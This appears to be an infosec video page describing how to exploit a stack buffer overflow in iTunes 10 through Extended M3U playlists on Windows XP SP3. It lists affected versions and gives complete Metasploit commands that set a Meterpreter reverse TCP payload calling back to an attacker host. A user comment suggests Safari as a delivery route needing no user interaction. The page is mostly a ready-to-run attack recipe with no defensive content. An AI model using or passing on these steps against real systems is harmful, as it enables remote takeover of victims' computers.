Description: In this video you will learn how to Exploit Apple iTunes 10 Extended M3U Bof Vulnerability.
Affected Version :-
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3
Steps :-
use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
http://osvdb.org/81656
http://eromang.zataz.com/2012/06/24/apple-itunes-10-extended-m3u-stack-buffer-overflow-vulnerability-metasploit-demo
Tags: metasploit , exploit , hacking ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Great Demonstration. This Vulnerability Works on Windows 7 ?
This is a stack buffer overflow in iTunes.
Safari can be an ideal target, because it will open the link without any user interaction.
@Easy-b0t No this Vulnerability Only for Windows XP SP3.